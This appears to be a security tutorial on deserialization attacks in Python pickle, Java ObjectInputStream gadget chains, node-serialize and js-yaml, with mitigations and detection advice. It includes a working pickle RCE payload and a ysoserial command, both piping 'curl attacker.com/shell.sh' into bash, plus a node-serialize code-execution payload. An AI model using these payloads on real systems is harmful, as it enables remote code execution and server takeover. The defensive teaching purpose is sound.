Deserialization Attacks: From Pickle to ObjectInputStream

Deserialization vulnerabilities are some of the scariest bugs in application security, because when they’re exploitable, it’s almost always remote code execution. The core problem is that an application reconstructs objects from untrusted data without validating what types are being instantiated. In languages with powerful serialization mechanisms – Python’s pickle, Java’s ObjectInputStream, PHP’s unserialize – an attacker can craft serialized payloads that execute arbitrary code during the deserialization process itself. The more I researched how these attacks work across languages, the more I appreciated how a single API call can turn into a full server compromise.

Why Deserialization Is Dangerous

Here’s the thing that most developers don’t internalize: deserialization is not just data parsing – it’s object construction. The deserializer instantiates classes, calls constructors, sets fields, and invokes lifecycle methods. If an attacker controls the serialized data, they control which classes get instantiated and what state they carry.

What makes this particularly insidious is that the attack doesn’t require a vulnerability in the application’s own code. It exploits classes already on the classpath (in Java) or importable (in Python) that have dangerous side effects during construction or destruction. Your code can be perfectly written, and you’re still vulnerable because of what’s sitting in your dependencies.

Python: pickle

Python’s pickle module is the most straightforward deserialization attack vector in any language. The documentation explicitly warns: “Never unpickle data received from an untrusted or unauthenticated source.” And yet it keeps showing up in production code.

The Vulnerability

import pickle
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/api/session/restore", methods=["POST"])
def restore_session():
    session_data = base64.b64decode(request.form.get("session"))
    session = pickle.loads(session_data)
    return jsonify({"user": session.get("username"), "role": session.get("role")})

The Exploit

import pickle
import base64
import os

class Exploit:
    def __reduce__(self):
        return (os.system, ("curl https://attacker.com/shell.sh | bash",))

payload = base64.b64encode(pickle.dumps(Exploit())).decode()
print(payload)  # Send this as the "session" parameter

The __reduce__ method tells pickle how to reconstruct the object. By returning (os.system, ("command",)), the attacker makes pickle.loads execute an arbitrary shell command. When I first worked through this exploit chain, I was struck by how little code it takes, a single pickle.loads call is all that stands between an attacker and a shell on the server. The simplicity is what makes it so dangerous.

Other Python Serialization Risks

# VULNERABLE: yaml.load without SafeLoader
import yaml
config = yaml.load(user_input)  # Can instantiate arbitrary Python objects

# VULNERABLE: shelve uses pickle internally
import shelve
db = shelve.open("sessions")
session = db[session_id]  # Deserializes with pickle

# VULNERABLE: marshal module
import marshal
code = marshal.loads(user_input)  # Can create code objects

yaml.load without SafeLoader is one that keeps showing up in code reviews. It’s one of those cases where the unsafe version is the default, and the safe version requires an extra argument. Bad API design leads to bad security outcomes.

Safe Alternatives

import json

@app.route("/api/session/restore", methods=["POST"])
def restore_session():
    session_data = request.form.get("session")
    session = json.loads(session_data)  # Only parses data, never instantiates objects
    return jsonify({"user": session.get("username"), "role": session.get("role")})

JSON deserialization is safe because JSON only represents primitive data types (strings, numbers, booleans, arrays, objects). It cannot instantiate classes or call functions. When someone asks “what should I use instead of pickle for untrusted data?” the answer is always JSON.

Java: ObjectInputStream and Gadget Chains

Java deserialization attacks are more complex than Python’s but far more impactful. Java applications use serialization everywhere – session management, RMI, JMX, message queues – and every one of those is a potential attack surface.

The Vulnerability

import java.io.*;

@PostMapping("/api/session/restore")
public ResponseEntity<?> restoreSession(@RequestBody byte[] data) {
    try {
        ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
        UserSession session = (UserSession) ois.readObject();
        return ResponseEntity.ok(Map.of("user", session.getUsername()));
    } catch (Exception e) {
        return ResponseEntity.badRequest().body("Invalid session");
    }
}

Here’s what catches developers off guard: the cast to UserSession happens after deserialization. By the time the cast fails (if it does), the attacker’s payload has already executed. The dangerous code runs inside readObject(), not during the cast. This timing issue is the key insight, the type cast provides no protection whatsoever.

Gadget Chains

Java deserialization exploits use “gadget chains” – sequences of existing library classes whose methods chain together to achieve code execution. The most famous is the Apache Commons Collections chain:

// Simplified concept, real gadget chains are more complex
// The attacker crafts a serialized object graph where:
// 1. A HashMap's readObject() calls hashCode() on its keys
// 2. The key is a TiedMapEntry that calls get() on a LazyMap
// 3. The LazyMap's get() calls transform() on a ChainedTransformer
// 4. The ChainedTransformer calls Runtime.exec() with the attacker's command

// Tools like ysoserial generate these payloads automatically:
// java -jar ysoserial.jar CommonsCollections1 "curl attacker.com/shell.sh | bash"

What I find fascinating about gadget chains is that the application code doesn’t need to use Commons Collections directly. If the library is anywhere on the classpath – as a transitive dependency, buried three levels deep in your dependency tree – the gadget chain works. The research community has documented gadget chains for dozens of common Java libraries, and new ones are discovered regularly.

Mitigation: ObjectInputFilter

ObjectInputStream ois = new ObjectInputStream(new ByteArrayInputStream(data));
ois.setObjectInputFilter(filterInfo -> {
    Class<?> clazz = filterInfo.serialClass();
    if (clazz == null) return ObjectInputFilter.Status.UNDECIDED;

    // Allowlist: only permit known safe classes
    Set<String> allowed = Set.of(
        "com.example.UserSession",
        "java.lang.String",
        "java.lang.Integer"
    );

    if (allowed.contains(clazz.getName())) {
        return ObjectInputFilter.Status.ALLOWED;
    }
    return ObjectInputFilter.Status.REJECTED;
});

UserSession session = (UserSession) ois.readObject();

ObjectInputFilter (Java 9+) lets you restrict which classes can be deserialized. An allowlist approach is strongly preferable to a blocklist, because new gadget chains are discovered regularly. Blocklists are a game of whack-a-mole that you will eventually lose.

JavaScript: JSON.parse Is Safe, But…

JavaScript’s JSON.parse is safe – it only creates plain objects, arrays, strings, numbers, booleans, and null. But JavaScript applications find other creative ways to deserialize dangerously.

node-serialize

const serialize = require('node-serialize');

app.post('/api/session/restore', (req, res) => {
    const sessionData = req.body.session;
    const session = serialize.unserialize(sessionData);
    res.json({ user: session.username });
});

node-serialize supports serializing functions. An attacker can craft a payload with an immediately-invoked function expression (IIFE):

// Attacker's payload
{"username":"admin","rce":"_$ND_FUNC$_function(){require('child_process').execSync('id')}()"}

The _$ND_FUNC$_ prefix tells node-serialize to evaluate the string as a function. The trailing () makes it execute immediately during deserialization. The fact that this library even exists is a cautionary tale about the dangers of serializing executable code.

js-yaml with Default Settings

const yaml = require('js-yaml');

// VULNERABLE: default yaml.load can instantiate JS objects
const config = yaml.load(userInput);

// SAFE: yaml.safeLoad or yaml.load with SAFE_SCHEMA
const config = yaml.load(userInput, { schema: yaml.SAFE_SCHEMA });

Same story as Python’s yaml.load – the unsafe version is the default. This pattern shows up in Node.js code reviews regularly.

Go: Mostly Safe, With Caveats

Go’s encoding/json and encoding/gob are safe by design – they only populate fields of pre-declared struct types. An attacker cannot cause arbitrary type instantiation. This is one of the things worth appreciating about Go’s approach to serialization.

type Session struct {
    Username string `json:"username"`
    Role     string `json:"role"`
}

func restoreSession(w http.ResponseWriter, r *http.Request) {
    var session Session
    if err := json.NewDecoder(r.Body).Decode(&session); err != nil {
        http.Error(w, "Invalid JSON", 400)
        return
    }
    // session is always a Session struct, no arbitrary type instantiation
}

The caveat is when a Go application uses interface{} as the target type and then uses type assertions to dispatch behaviour. An attacker can influence which code path executes by controlling the JSON structure. This isn’t deserialization RCE, but it can lead to logic bugs that are hard to reason about.

// Potentially dangerous: behavior depends on deserialized type
var data interface{}
json.NewDecoder(r.Body).Decode(&data)

switch v := data.(type) {
case map[string]interface{}:
    processObject(v)
case []interface{}:
    processArray(v)
// attacker controls which branch executes
}

Detection Strategies

Static Analysis

Python: Bandit B301 (pickle), B506 (yaml.load). Semgrep rules for pickle.loads, yaml.load, shelve.open. These are reliable and catch the obvious usage patterns.
Java: SpotBugs OBJECT_DESERIALIZATION. Semgrep rules for ObjectInputStream without ObjectInputFilter. The Semgrep rules tend to be more actionable here.
JavaScript: Semgrep rules for node-serialize, js-yaml without safe schema.
Go: No common deserialization vulnerabilities to scan for. One less thing to worry about.

Runtime Detection

Monitor for unexpected class loading during deserialization (Java).
Use application-level logging to record deserialized type names.
Deploy runtime application self-protection (RASP) that blocks dangerous class instantiation.

Remediation

The universal principle: never deserialize untrusted data using a format that supports arbitrary type instantiation.

Language	Dangerous	Safe Alternative
Python	`pickle.loads`, `yaml.load`	`json.loads`, `yaml.safe_load`
Java	`ObjectInputStream.readObject`	JSON (Jackson/Gson), Protocol Buffers
JavaScript	`node-serialize`, `js-yaml` default	`JSON.parse`, `js-yaml` with SAFE_SCHEMA
Go	N/A (safe by design)	`encoding/json`, `encoding/gob`

If you must use Java serialization (legacy systems, RMI), apply ObjectInputFilter with a strict allowlist. If you must use pickle (ML model loading is the usual justification), verify the source with cryptographic signatures before deserializing. But the best fix is always to switch to a data-only format like JSON or Protocol Buffers. The migration is straightforward, and the security improvement is dramatic.